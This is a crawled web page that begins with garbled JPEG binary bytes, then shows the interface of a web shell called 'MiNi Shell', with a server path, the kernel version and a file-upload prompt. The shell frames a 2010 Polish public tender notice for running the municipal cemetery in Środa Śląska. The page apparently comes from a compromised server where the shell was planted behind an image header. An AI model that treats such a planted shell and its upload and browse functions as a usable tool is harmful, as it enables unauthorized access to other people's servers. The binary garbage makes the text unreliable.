JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101129/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101129/387618-N-2010.html

<p class="kh_header"><b>Środa Śląska: Świadczenie usług   na administrowanie i zarządzanie cmentarzem komunalnym w Środzie Śląskiej.</b><br>
<b>Numer ogłoszenia: 387618 - 2010; data zamieszczenia: 29.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Środa Śląska , Plac Wolności 5, 55-300 Środa Śląska, woj. dolnośląskie, tel. 71 3960724, faks 71 3173405.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług   na administrowanie i zarządzanie cmentarzem komunalnym w Środzie Śląskiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje następujące usługi, i tak; 
A. Czynności eksploatacyjne , polegające na:
1)Całorocznym utrzymaniu czystości i porządku na terenie cmentarza (w tym również cmentarza wojennego) oraz terenu przyległego, a w szczególności:
- utrzymanie czystości terenu (zbieranie i  usuwanie śmieci winno być wykonywane z częstotliwością zapewniającą ciągłe utrzymanie czystości)
- utrzymanie właściwych warunków sanitarnych w kaplicy, chłodni i lokalu administracyjnym
- systematycznego oczyszczania  punktów czerpania wody;
- utrzymanie w należytym stanie sanitarnym i porządkowym (zapewnienie środków czystości, papieru toaletowego i ręczników papierowych) toalety wolno stojącej, w przypadku jej zakupu i montażu na parkingu przed cmentarzem komunalnym w Środzie Śląskiej
Przez teren przyległy należy rozumieć teren wokół cmentarza od ogrodzenia cmentarza na odległości 2 m oraz parking przed cmentarzem i otoczenie lokalu administracyjnego.
2) Pielęgnacji i utrzymania mogił żołnierzy poległych w czasie wojen znajdujących się na terenie cmentarza  wojennego.
3) Zapewnieniu prawidłowego gromadzenia i wywozu odpadów stałych zgodnie z ustawą z dnia 27 kwietnia 2001 roku o odpadach (Dz. U. Nr 62, poz. 628 ze zmianami).(z częstotliwością dostosowaną do potrzeb) w tym:
      - zapewnienie prawidłowego gromadzenia i wywozu odpadów niebezpiecznych z pomieszczenia - chłodni (z częstotliwością dostosowaną do potrzeb);
- wyposażenie terenu cmentarza w urządzenia służące do zbierania odpadów komunalnych oraz utrzymywania tych urządzeń w odpowiednim stanie sanitarnym,porządkowym i technicznym;
         - zapewnienie prawidłowego gromadzenia i wywozu gruzu betonowego z rozbiórek 	nagrobków.
4)  Zimowym utrzymaniu alejek , poprzez ich odśnieżanie oraz  likwidowanie ich śliskości.
5) Należytym utrzymaniu zieleni na cmentarzu, a w szczególności:
- pielęgnacji żywopłotów (cięcie i odchwaszczanie z częstotliwością zapewniającą ich estetyczny wygląd)
- wykaszaniu trawników na cmentarzu (w tym alejek między grobami) i terenie przyległym z częstotliwością zapewniającą estetyczny wygląd
- systematycznym grabieniu i wywozie liści (wiosna, jesień)
- usuwaniu odrostów w strefie korzeniowej drzew oraz usuwaniu samosiewów
- odchwaszczaniu alejek głównych 
- wykonywaniu okresowych przeglądów stanu sanitarnego drzew i krzewów na cmentarzu komunalnym oraz pisemne przedkładanie Zamawiającemu informacji o drzewach stwarzających zagrożenie dla ludzi i pomników.
6) Prowadzenie kontroli i przeglądów stanu technicznego instalacji i urządzeń technicznych zgodnie z obowiązującymi przepisami oraz informowanie Zamawiającego o potrzebie dokonywania niezbędnych prac remontowych nie obciążających administratora. 
7) Niezwłoczna organizacja wszelkich działań niezbędnych do likwidacji awarii instalacji, urządzeń oraz uszkodzeń na administrowanym terenie.
8)  Wyposażenie kaplicy i lokalu administracyjnego w niezbędną ilość gaśnic, konserwacja tablic informacyjnych.
9) Wykonywaniu bieżących napraw i konserwacji instalacji i wyposażenia Kaplicy.
Przez naprawę bieżąca należy rozumieć  okresowy remont elementów budynku, instalacji, który ma na celu zapobiegania skutkom zużycia tych elementów i utrzymanie budynku i instalacji  we właściwym stanie technicznym 
Przez konserwację należy rozumieć  wykonywanie robót mających na celu utrzymanie sprawności technicznej elementów budynku i instalacji.
- Wykonywaniu bieżących napraw i konserwacji urządzeń w kaplicy wraz z  chłodnią oraz bieżące naprawy ogrodzenia terenu cmentarza i alejek. 
Konserwacja i bieżące naprawy instalacji elektrycznej,  w tym :
                                                                                          	- wymiana lub uzupełnienie żarówek w lampach oświetlenia przynależnego do  	nieruchomości;  uzupełnienie brakujących kloszy;
- wymiana i naprawa lamp, naprawa elementów układu sterującego oświetleniem;
- wymiana zabezpieczeń nadmiarowo-prądowych oświetlenia;                                                           - wymiana uszkodzonych wyłączników oświetlenia i gniazd zasilających;
- utrzymywanie skrzynek elektrycznych głównych w czystości, sprawdzanie umocowania przewodów elektrycznych;
- wyszukiwanie przerw i zwarć w instalacji elektrycznej oraz usuwanie przyczyn wraz z wymianą upalonych końcówek w szafce zasilająco - sterującej;
- dokonywanie okresowych przeglądów instalacji elektrycznej.
9) Konserwacja i bieżące  naprawy instalacji wodnej i kanalizacyjnej , w tym: 
- sprawdzanie prawidłowości działania wodomierza głównego oraz jego wskazań;
-  sprawdzanie stanu instalacji wodnej oraz usuwanie nieszczelności;
-  uszczelnienie wszystkich zaworów wodnych oraz ich pojedyncza wymiana;
-  likwidowanie miejscowych przecieków w instalacji wodnej;                                                -  naprawa punktów czerpania  wody;
-  przygotowanie instalacji wodociągowej do sezonu zimowego.
B. Czynności administracyjne, polegające na:
Prowadzeniu dokumentacji wymaganej obowiązującymi przepisami (Rozporządzenie Ministra Spraw Wewnętrznych i Administracji w sprawie sposobu prowadzenia ewidencji grobów - Dz. U. z 2001 r Nr 90 poz. 1013. wraz z późniejszymi zmianami) w tym prowadzenie następującej dokumentacji : - księgi osób pochowanych na cmentarzu, prowadzonej według numeracji narastającej lub w układzie rocznikowym, - księgi grobów , - księgi cmentarnej zawierającej alfabetyczny spis osób pochowanych na cmentarzu, - kompletowanie i przechowywanie kart zgonów.
Powyższą dokumentację cmentarną wykonawca obowiązany jest prowadzić dodatkowo w formie elektronicznej  zgodnie z obowiązującymi przepisami, a także do bezpiecznego jej przechowywania. Dokumentacja, w tym również w formie elektronicznej, po okresie realizacji umowy zostanie przekazana nieodpłatnie Zamawiającemu. Administrator zapewni wszelkie materiały i akcesoria niezbędne do prowadzenia dokumentacji cmentarza w systemie tradycyjnym i elektronicznym.
1. Całodobowe przyjmowanie zwłok do chłodni oraz prowadzenie rejestru przyjęć zwłok do chłodni i ich wydania.
2. Wytyczanie nowych miejsc do  pochówków zgodnie z planem zagospodarowania cmentarza.
3. Sprawowanie nadzoru nad prawidłowym korzystaniu z cmentarza przez inne podmioty wykonujące usługi na terenie cmentarza z uwzględnieniem ich równego  traktowania.
4. Ustalanie terminów i warunków pogrzebów.
5. Otwierania i zamykanie bram cmentarza dla konduktów pogrzebowych i firm kamieniarskich.
6. Pobieranie opłat za korzystanie z cmentarza komunalnego w wysokości ustalonej Uchwałą Rady Miejskiej w Środzie Śląskiej  oraz terminowe, co tygodniowe w każdy piątek tygodnia przekazywanie ich do kasy Urzędu Miejskiego w Środzie Sląskiej  
7. Prowadzenie odpowiedniej ewidencji księgowej pozwalającej w sposób czytelny sprawdzić prawidłowość wysokości wpłat do budżetu gminy oraz przedkładanie Zamawiającemu tygodniowych i miesięcznych zestawień  pobranych opłat za korzystanie z cmentarza komunalnego.  
8. Sporządzanie rocznych sprawozdań finansowych z kosztów zarządzania cmentarzem oraz każdorazowo na żądanie Zamawiającego..
9. Przedkładanie Zamawiającemu do zatwierdzenia zmian w regulaminie cmentarza oraz cenniku opłat cmentarnych.
10. Ponoszenie wydatków za dostawę energii elektrycznej, wody, wywóz nieczystości itp. na które Zarządca zawarł umowy.
11. Sporządzanie kwartalnych sprawozdań o stopniu wykorzystania miejsc grzebalnych  oraz każdorazowo na żądanie Zamawiającego.
Przestrzeganie obowiązującego regulaminu cmentarza oraz egzekwowanie jego postanowień wobec osób korzystających z obiektu, 
Informacje dotyczące   cmentarza:
Cmentarz komunalny zlokalizowany na działce nr 2/1 AM-9 wraz z wydzieloną częścią cmentarza wojennego oraz w jej obrębie tj. teren wzdłuż ogrodzenia, parking wraz z lokalem administracyjnym przy ul. Cmentarnej 7 o pow. 69,1 m2 zlokalizowanym na działce nr 11/2 o pow. 3,60 ha, wraz z wydzieloną częścią działki nr 11/1 z wejściem od ul. Cmentarnej.	Administrator w ramach bieżącego utrzymania cmentarza ponosi koszty związane z wywozem nieczystości  i bieżące zużycie wody i energii.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 93.37.11.10-1, 79.42.00.00-1, 98.37.11.11-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 7000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział Wykonawcy, którzy: -spełniają warunki, o których mowa w art. 22 ust. 1 pkt 1-4 Ustawy Pzp i nie są wykluczeni z ubiegania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1-2 Ustawy Pzp, - złożą wymagane dokumenty określone w  s.i.w.z., Ocena spełnienia powyższych warunków zostanie dokonana na podstawie dokumentów o których mowa w dalszej części ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie niniejszego zamówienia publicznego, stosownie do postanowień art. 22 ust. 1 ustawy, winien złożyć podpisane oświadczenie dotyczące: - posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; - posiadania wiedzy i doświadczenia; - dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; - sytuacji ekonomicznej i finansowej. - niepodlegania wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1-2 Ustawy Pzp - wg wzoru załącznik a do s.i.w.z. W celu potwierdzenia posiadania uprawnień do wykonywania określonej działalności lub czynności oraz potwierdzenia, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy, stosownie do postanowień art. 26 ust. 2 i art. 44 ustawy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30.12.2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, wykonawcy winni złożyć (w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę) następujące dokumenty: - 
1.Wykazu wykonanych  w przeciągu ostatnich trzech lat ( zał do siwz)  przed wszczęciem postępowania,  w tym okresie  min. jedną usługę polegającą na  nieprzerwanym administrowaniu i utrzymaniu cmentarza przez  ten okres o łącznej liczbie grobów 3000 sztuk - na potwierdzenie  czego przedłożą odpowiednie referencje wraz z dokumentami   stwierdzające ukończenie prze osoby zatrudnione szkoły średniej o kierunku   ogrodniczym , leśnym lub rolniczym oraz przedłożą dokument potwierdzający prowadzenie przez osobę w przeciągu ostatnich trzech lat ksiąg cmentarnych oraz zarządzaniem cmentarza ( nieprzewalanie przez okres jednego roku )2.Posiadanie  sprzętu niezbędnego do utrzymania cmentarza : kosiarka, podkosiarka.  ( zał. do siwz)
3. Posiadanie sprzętu komputerowego wraz z licencjonowanym oprogramowaniem do prowadzenie ewidencji cmentarnej ( zał do siwz) Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia dokonana zostanie zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie  sprzętu niezbędnego do utrzymania cmentarza : kosiarka,, podkosiarka 
Posiadanie sprzętu komputerowego wraz z licencjonowanym oprogramowaniem do prowadzenie ewidencji cmentarnej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu o udzielenie zamówienia dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz ofertowy 
2)Zaakceptowany projekt umowy na świadczenie usług komunalnych w zakresie      administrowania cmentarzem komunalnym w Środzie Śląskiej  (zał do siwz )
3)Przedłożenie  planu organizacji sposobu utrzymania  i funkcjonowania cmentarza w okresie od 27 października do 5 listopada.
5) Wskazanie miejsca wywozu odpadów z cmentarza potwierdzone umową lub zapewnieniem właściciela składowiska lub umową na usuwanie odpadów z jednostką posiadającą zezwolenie.
6)  Dowód wpłaty wadium 5000 zł 
      7) Zobowiązanie do wpłaty na konto Zamawiającego należności z tytułu pobranych
         przez   Zarządcę  opłat za świadczone  usługi cmentarne  w wysokości ustalonej w
         obowiązującej  uchwale  Rady Miejskiej w Środzie Śląskiej. (zał do siwz )
      8) . Kalkulacje kosztów utrzymania cmentarza . 
 9). Zobowiązanie do wniesienia zabezpieczenia  należytego wykonania umowy
        (zał do siwz)  .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a) zmiany zakresu przedmiotu umowy - jeżeli z wnioskiem takim wystąpi Zamawiający lub zmiana taka
stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć w chwili składania
oferty,
b) zmian przewidzianych zapisami umowy lub SIWZ.
2.Zamawiający dopuszcza także możliwość zmian umowy w następujących przypadkach:
a) gdy zaistnieją okoliczności niezależne od Wykonawcy, których nie można było przewidzieć w chwili
zawarcia umowy, pod warunkiem, że zmiana ta sprzyjać będzie optymalnemu wykonaniu zamówienia,
jak również oszczędnemu, celowemu i gospodarnemu wydatkowaniu środków finansowych,
b) gdy wprowadzenie zmian jest korzystne dla Zamawiającego,
c) gdy wystąpią zdarzenia losowe,
d) gdy wystąpią zmiany, wysokości stawki podatku VAT .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.srodaslaska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Pokój B-13 Urzędu Miejskiego Plac Wolności 5 , 55-300 Środa Śląska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2010 godzina 10:00, miejsce: Pokój B-13 Urzędu Miejskiego Plac Wolności 5 , 55-300 Środa Śląska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com